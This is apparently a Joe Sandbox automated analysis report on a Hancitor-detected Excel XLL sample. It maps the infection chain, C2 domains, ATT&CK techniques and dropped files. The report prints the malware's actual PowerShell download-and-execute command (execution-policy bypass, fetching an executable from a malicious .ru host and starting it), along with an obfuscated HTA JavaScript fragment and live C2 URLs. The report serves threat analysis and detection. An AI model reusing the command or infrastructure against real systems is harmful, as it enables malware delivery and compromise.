        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
        Source: C:\Users\Public\snd32sys.exe | Queries volume information: C:\ VolumeInformation
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_0062B84D GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_00657096 _free,_free,_free,GetTimeZoneInformation,_free,
        Source: C:\Users\Public\snd32sys.exe | Code function: 16_2_00611A80 GetVersion,wsprintfA,wsprintfA,

        Remote Access Functionality:

        Yara detected Hancitor
        Source: Yara match | File source: 16.3.snd32sys.exe.12f4305.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 16.3.snd32sys.exe.12f4305.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 16.2.snd32sys.exe.610000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000010.00000003.437644933.00000000012F0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: Process Memory Space: snd32sys.exe PID: 2160, type: MEMORY

        Mitre Att&ck Matrix

        Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
        Valid Accounts | Native API 1 | Application Shimming 1 | Application Shimming 1 | Deobfuscate/Decode Files or Information 1 | OS Credential Dumping | System Time Discovery 2 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Data Obfuscation 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
        Default Accounts | Exploitation for Client Execution 1 | Boot or Logon Initialization Scripts | Process Injection 112 | Obfuscated Files or Information 2 | LSASS Memory | File and Directory Discovery 2 | Remote Desktop Protocol | Email Collection 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 12 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
        Domain Accounts | Command and Scripting Interpreter 1 | Logon Script (Windows) | Logon Script (Windows) | Software Packing 11 | Security Account Manager | System Information Discovery 36 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Encrypted Channel 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
        Local Accounts | PowerShell 1 | Logon Script (Mac) | Logon Script (Mac) | Masquerading 111 | NTDS | Query Registry 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Non-Application Layer Protocol 3 | SIM Card Swap | | Carrier Billing Fraud
        Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Virtualization/Sandbox Evasion 21 | LSA Secrets | Security Software Discovery 21 | SSH | Keylogging | Data Transfer Size Limits | Application Layer Protocol 123 | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
        Replication Through Removable Media | Launchd | Rc.common | Rc.common | Process Injection 112 | Cached Domain Credentials | Process Discovery 2 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
        External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | Virtualization/Sandbox Evasion 21 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
        Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | Application Window Discovery 1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
        Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | Remote System Discovery 1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
        Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Invalid Code Signature | Network Sniffing | System Network Configuration Discovery 1 | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact

        Behavior Graph

        Behavior Graph ID: 445958 | Sample: 0708_5355150121.xll | Start date: 08/07/2021 | Architecture: WINDOWS | Score: 100
        [Behavior graph image not reproduced; the node data recoverable from it follows.]
        • Sample: Found malware configuration; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 8 other signatures
        • EXCEL.EXE (started by the sample): contacts srand04rf.ru (8.211.241.0, ports 49724, 49748, 80; CNNIC-ALIBABA-US-NET-AP Alibaba US Technology Co Ltd, Singapore); drops C:\Users\Public\res32.hta (HTML); starts mshta.exe
        • mshta.exe: starts powershell.exe
        • powershell.exe: Drops PE files to the user root directory; Powershell drops PE file; starts snd32sys.exe, a second powershell.exe, and conhost.exe
        • second powershell.exe: contacts srand04rf.ru and 192.168.2.1 (unknown); drops C:\Users\Public\snd32sys.exe (PE32)
        • snd32sys.exe: contacts sudepallon.com (77.222.42.67, ports 49757, 49758, 49759; SWEB-AS RU, Russian Federation), elb097307-934924932.us-east-1.elb.amazonaws.com (23.21.173.155, ports 49756, 80; AMAZON-AES US, United States) and 2 other IPs or domains; Detected unpacking (overwrites its own PE header); May check the online IP address of the machine; Contains functionality to inject threads in other processes


        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        Source | Detection | Scanner | Label
        0708_5355150121.xll | 24% | Virustotal |
        0708_5355150121.xll | 17% | ReversingLabs | Win32.Trojan.Babar

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        Source | Detection | Scanner | Label
        16.2.snd32sys.exe.610000.0.unpack | 100% | Avira | TR/Dropper.Gen

        Domains

        No Antivirus matches


Domains and IPs

Contacted Domains

Name                                              IP              Active    Malicious   Antivirus Detection   Reputation
elb097307-934924932.us-east-1.elb.amazonaws.com   23.21.173.155   true      false                             high
srand04rf.ru                                      8.211.241.0     true      true                              unknown
sudepallon.com                                    77.222.42.67    true      true                              unknown
api.ipify.org                                     unknown         unknown   false                             high

Contacted URLs

Name                                 Malicious   Antivirus Detection     Reputation
http://api.ipify.org/                false                               high
http://thentabecon.ru/8/forum.php    true        Avira URL Cloud: safe   unknown
http://anspossthrly.ru/8/forum.php   true        Avira URL Cloud: safe   unknown
http://srand04rf.ru/08.jpg           true        Avira URL Cloud: safe   unknown

URLs from Memory and Binaries

                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://management.azure.com/F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://login.windows.net/common/oauth2/authorizeF2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drfalse
                                                                                                                                                  high

Contacted IPs


Public

IP | Domain | Country | ASN | ASN Name | Malicious
23.21.173.155 | elb097307-934924932.us-east-1.elb.amazonaws.com | United States | 14618 | AMAZON-AESUS | false
77.222.42.67 | sudepallon.com | Russian Federation | 44112 | SWEB-ASRU | true
8.211.241.0 | srand04rf.ru | Singapore | 45102 | CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 445958
Start date: 08.07.2021
Start time: 16:29:13
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 8m 20s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: 0708_5355150121.xll
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 28
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.expl.evad.winXLL@10/11@4/4
EGA Information: Failed
HDC Information:
• Successful, ratio: 3% (good quality ratio 2.9%)
• Quality average: 88.5%
• Quality standard deviation: 21.2%
HCA Information:
• Successful, ratio: 75%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xll
Warnings:
• Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• HTTP packets have been reduced
• TCP packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 40.88.32.150, 104.42.151.234, 13.88.21.125, 52.109.88.177, 52.109.12.21, 52.147.198.201, 20.82.210.154, 2.20.84.85, 51.103.5.186, 20.82.209.183, 95.101.22.134, 95.101.22.125, 40.112.88.60, 92.122.145.220
• Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcoleus15.cloudapp.net, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, nexus.officeapps.live.com, arc.trafficmanager.net, officeclient.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, client.wns.windows.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, skypedataprdcolwus15.cloudapp.net, europe.configsvc1.live.com.akadns.net
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtDeviceIoControlFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time | Type | Description
16:30:52 | API Interceptor | 50x Sleep call for process: powershell.exe modified
16:31:54 | API Interceptor | 91x Sleep call for process: snd32sys.exe modified

                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                  IPs

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                  23.21.173.155file.docGet hashmaliciousBrowse
                                                                                                                                                  • api.ipify.org/?format=xml
                                                                                                                                                  file.dllGet hashmaliciousBrowse
                                                                                                                                                  • api.ipify.org/?format=xml
                                                                                                                                                  file.dllGet hashmaliciousBrowse
                                                                                                                                                  • api.ipify.org/?format=xml
                                                                                                                                                  file.docGet hashmaliciousBrowse
                                                                                                                                                  • api.ipify.org/?format=xml
                                                                                                                                                  file.dllGet hashmaliciousBrowse
                                                                                                                                                  • api.ipify.org/?format=xml
                                                                                                                                                  file.dllGet hashmaliciousBrowse
                                                                                                                                                  • api.ipify.org/?format=xml
                                                                                                                                                  77.222.42.67triage_dropped_file.dllGet hashmaliciousBrowse
                                                                                                                                                  • mancause.ru/8/forum.php
                                                                                                                                                  nimb.dllGet hashmaliciousBrowse
                                                                                                                                                  • mancause.ru/8/forum.php
                                                                                                                                                  0706_1050501748839.docGet hashmaliciousBrowse
                                                                                                                                                  • mancause.ru/8/forum.php
                                                                                                                                                  file.dllGet hashmaliciousBrowse
                                                                                                                                                  • mancause.ru/8/forum.php
                                                                                                                                                  file.docGet hashmaliciousBrowse
                                                                                                                                                  • mancause.ru/8/forum.php
                                                                                                                                                  file.docGet hashmaliciousBrowse
                                                                                                                                                  • mancause.ru/8/forum.php
                                                                                                                                                  file.dllGet hashmaliciousBrowse
                                                                                                                                                  • mancause.ru/8/forum.php
                                                                                                                                                  file.docGet hashmaliciousBrowse
                                                                                                                                                  • mancause.ru/8/forum.php

                                                                                                                                                  Domains

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                  elb097307-934924932.us-east-1.elb.amazonaws.comOTzccW5OZg.exeGet hashmaliciousBrowse
                                                                                                                                                  • 50.16.226.23
                                                                                                                                                  ve88CBNzQZ.dllGet hashmaliciousBrowse
                                                                                                                                                  • 50.16.216.118
                                                                                                                                                  triage_dropped_file.dllGet hashmaliciousBrowse
                                                                                                                                                  • 54.235.175.90
                                                                                                                                                  nimb.dllGet hashmaliciousBrowse
                                                                                                                                                  • 50.16.216.118
                                                                                                                                                  0706_1050501748839.docGet hashmaliciousBrowse
                                                                                                                                                  • 50.16.216.118
                                                                                                                                                  file.dllGet hashmaliciousBrowse
                                                                                                                                                  • 23.21.136.132
                                                                                                                                                  file.docGet hashmaliciousBrowse
                                                                                                                                                  • 23.21.211.162
                                                                                                                                                  file.docGet hashmaliciousBrowse
                                                                                                                                                  • 23.21.136.132
                                                                                                                                                  file.dllGet hashmaliciousBrowse
                                                                                                                                                  • 54.235.121.178
                                                                                                                                                  file.docGet hashmaliciousBrowse
                                                                                                                                                  • 50.16.246.238
                                                                                                                                                  0706_1715044809783.docGet hashmaliciousBrowse
                                                                                                                                                  • 54.235.175.90
                                                                                                                                                  niberius.dllGet hashmaliciousBrowse
                                                                                                                                                  • 50.16.218.217
                                                                                                                                                  nimb.dllGet hashmaliciousBrowse
                                                                                                                                                  • 54.225.78.40
                                                                                                                                                  4h2yLkN8DO.dllGet hashmaliciousBrowse
                                                                                                                                                  • 23.23.104.250
                                                                                                                                                  TejsR02giJ.exeGet hashmaliciousBrowse
                                                                                                                                                  • 50.16.216.118
                                                                                                                                                  juON02msHS.dllGet hashmaliciousBrowse
                                                                                                                                                  • 23.23.104.250
                                                                                                                                                  B6tFTmWwt8.exeGet hashmaliciousBrowse
                                                                                                                                                  • 50.16.218.217
                                                                                                                                                  Y0Cc092A1t.exeGet hashmaliciousBrowse
                                                                                                                                                  • 54.235.175.90

ASN

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\Public\res32.hta
Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type: HTML document, ASCII text, with very long lines, with CRLF line terminators
Category: dropped
Size (bytes): 8419
Entropy (8bit): 5.163512636419693
Encrypted: false
SSDEEP: 192:/arm5dHoAR5V98geGR4qUg3fjRORjkSRQvRIPLBaGxmBWzMIAlPoP8L7T:/audHjf98lRqTP9UgYCGNaGxmNDlo8L3
MD5: 71999A9D2F15E164C9B1FA926AA6444B
SHA1: C1FBD2B6458B474A208B6CC710951940C9290E5C
SHA-256: DA92436D2BBCDEF52B11ACE6E2E063E9971CEFC074D194550BD425305C97CDD5
SHA-512: 298EAAB6D157E81BB738B1605285A0D14B05AE3656F1BBF72C4921C78B74BE7048B6744144469CB4EF48F4D4D233F794C366F192765A4F193C48B2DE2EFF4C27
Malicious: true
Reputation: low
                                                                                                                                                  Preview: <!DOCTYPE html>..<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >....<html>..<body>....<script language="javascript">..var _0x8c86 = [.. 'W6RcUHHOW4dcUSocyZGj',.. 'WQBdGaO7WPqZW73dIq',.. 'W4pcLqKgyCkGaaHJW6O',.. 'W4hcOqzBnmo7W7HC',.. 'bWFcVWmEW4fSxsldUSoKWPW',.. 'WQxcUs0tWQG2W74',.. 'yfC1W6BcPef7W6ldJdu',.. 'WPVcJSoCnHyuWRNdHmkHWPbYWQK',.. 'W57cKCoKiCkGW5/cPZrZmW',.. 'WQxdHxzcW7WBW4BdVqnvWPm',.. 'W5NdTCklAg8dWPhdPSk0WR9JWQ3cLSo4WPpdN2O',.. 'zg5jW70/wJ1eW4lcOK/cHG',.. 'WPbyBmoUWPDzkblcJWHYcq',.. 'W7ldUt/cN8kdWPNcQty',.. 'aahdHuTHWP9DqG',.. 'WQdcMbi8WOSxW7q',.. 'W7iQnmo+DCkVzSoc',.. 'W5WHrvJcTmoFEw/cRSolcmo5mmoI',.. 'k8ofemkaW5PbzczLlcXQ',.. 'W7hdUMpdHCo8W5FcKHqqye9M',.. 'a8opcSkonCkOrq',.. 'WPb5WQVdV0hcQSk7W58',.. 'y1DLWRxcKe1oW6a',.. 'W53cKSoPk8oPW5dcLdzuiCk+',.. 'W48dx8kNWPVdIXzeiSoDW6RdMmk4WOZcGmkqgd7dKCk/WR7cLSoQWRL6W4XRee3dKmopiL3cMJm5iCkgW67cMLuxW73cMrldNCkvCfZdKCo5zmolW5tcJvdcISoLW6ONW77dS8k4tm
C:\Users\Public\snd32sys.exe
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 763392
Entropy (8bit): 6.644646436393566
Encrypted: false
SSDEEP: 12288:4AbvaOTfFGikmS6jd2QML8HXWp8KEwbHBkm9jjgbFHLViv0dC2x0uTadTaUk7u:vbvJfFGikmS0pXfw7Bkm9j088PlTaDj
MD5: ED1921467F6784AF6BDCA40A06A541B5
SHA1: 63B70725C3298D5FA17277EC64C77A4B6FBCF697
SHA-256: 3DB14214A9EB98B3B5ABFFCB314C808A25ED82456CE01251D31E8EA960F6E4E6
SHA-512: A30779D84521049F4CEBA11B0F0B16430DB8A38FF38AB540585C9AE89D7214655E0C5C246E21E97AB65D8F3DC0D472DDB8BDA1E01AF82E632C66A2CCD159F020
Malicious: true
Reputation: low
C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\F2E779D9-2A7F-4724-B0D9-67BDDA1F0003
Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type: XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category: dropped
Size (bytes): 135209
Entropy (8bit): 5.363084368102766
Encrypted: false
SSDEEP: 1536:qcQIKNgeBTA3gBwlpQ9DQW+zoY34ZliKWXboOidX5E6LWME9:MEQ9DQW+zwXO1
MD5: 585F16F872D700ED9074C9599BFCAA8D
SHA1: A7B0CEC26282A4EBDD6B8A336B6C922EB7CCB546
SHA-256: 27F46B4BD834974CEEC3353473B97BCF16BD3AF5FBD14BEC8340D2B8048BA237
SHA-512: 94B68F6C6BF74CFCE8CF9D3E908EB674EDF0F93B097885301BF60B6D536BC38FB596DE3047142BCBF8F879FC417632F11B4BDCAFB8C4C4C8AFBCB1BCDF34C73C
Malicious: false
Reputation: low
                                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-07-08T14:30:08">.. Build: 16.0.14306.30528-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 17512
Entropy (8bit): 5.575682556842605
Encrypted: false
SSDEEP: 384:qtpOrhtOomtrzRkSBKnKileIoK7Q99gtSJQpO1ViYbR:H4KKiler98tRC7l
MD5: 804765CA20FB452B7AFDC20F54DDC5BC
SHA1: 1E475060FAC7DC9546B6DF29B78D139485F5E105
SHA-256: 1E64FB0B2717B6E64DC2C096EF0169206D5C25A854760C212FBA76EF5E362E51
SHA-512: 2887822470F0F2C21FC08F7DF3EBEBF873E9844C62F5666A66D43D1345E003BCB6A8CDDFDAC42ADA6C34C750092E2190F2B5460E531382E1604493FD6E4BA6A6
Malicious: false
Reputation: low
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_021oib5j.5er.ps1
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: very short file (no magic)
Category: dropped
Size (bytes): 1
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3:U:U
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious: false
Reputation: high, very likely benign file
                                                                                                                                                  Preview: 1
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_33lmhbcg.erz.psm1
                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: 1
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l5bzl405.f5n.psm1
                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: 1
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m31y4pff.piz.ps1
                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                  Malicious:false
Preview: 1
Note: the __PSScriptPolicyTest_*.ps1 and .psm1 files (1 byte each, content "1") are written to %TEMP% by powershell.exe itself at start-up to probe whether an AppLocker or WDAC script policy is enforced; they appear in any PowerShell run and are not payload artefacts of the sample.
                                                                                                                                                  C:\Users\user\Documents\20210708\PowerShell_transcript.888683.0syxhOX+.20210708163014.txt
                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1205
                                                                                                                                                  Entropy (8bit):5.311205245712001
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:BxSA5xvBnnDx2DOXUWTLST1lDPWKHjeTKKjX4CIym1ZJXgrLST1lDRnxSAZ0:BZLvhDoOXu1cKqDYB1ZUu1vZZ0
                                                                                                                                                  MD5:45D933EF1A814178B4C30D1C511EEA62
                                                                                                                                                  SHA1:92AB0E5235A9C4FED5941154906879B3C51F8FD2
                                                                                                                                                  SHA-256:FF3092607FC1517161D2C45D1014A05475343498EEFC44C7C834FB81661D7688
                                                                                                                                                  SHA-512:16EE676884C815562AD21973E371EDB772514726DA50D1DDE806BA92A4335871DAF897D90A89FA8C5F963E4F34728716C4048EBDC763A8E419CEB7C67BF5B35F
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: .**********************..Windows PowerShell transcript start..Start time: 20210708163025..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 888683 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe'..Process ID: 5944..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210708163026..**********************..PS>poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe'....********
                                                                                                                                                  C:\Users\user\Documents\20210708\PowerShell_transcript.888683.93l2YHGR.20210708163033.txt
                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1066
                                                                                                                                                  Entropy (8bit):5.2109369727717985
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:BxSADxvBnnDx2DOXUW4L1+WEHjeTKKjX4CIym1ZJXsNnxSAZNq:BZtvhDoOs1pEqDYB1ZOxZZNq
                                                                                                                                                  MD5:2DB1F1A4DD113B692007B7089DE7A226
                                                                                                                                                  SHA1:03920B9D36563DFB26E0408BD2A9DE9B8914F0FE
                                                                                                                                                  SHA-256:9815EE4EF24399DA60B77429BFB41E1D5BCDEB7B5FBA7DC2F4B9C442B7264215
                                                                                                                                                  SHA-512:A4788DA06C4FA30BD8302AF771B08EC605B72C06FA10A50671143E95DBD816D2264A9C5AE640B4783153F5A6A51413CC447CEEE15FE3EC1E8818F1DE2807B2BA
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: .**********************..Windows PowerShell transcript start..Start time: 20210708163045..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 888683 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -EX bYpASs -NOp -w 1 WGeT http://srand04rf.ru/08.jpg -OuTfIle c:\Users\Public\snd32sys.exe..Process ID: 5788..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210708163046..**********************..PS>WGeT http://srand04rf.ru/08.jpg -OuTfIle c:\Users\Public\snd32sys.exe..**********************..Command start time: 20210708163350..**********************..PS>$global:?..True..**********************..Windows PowerShell
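
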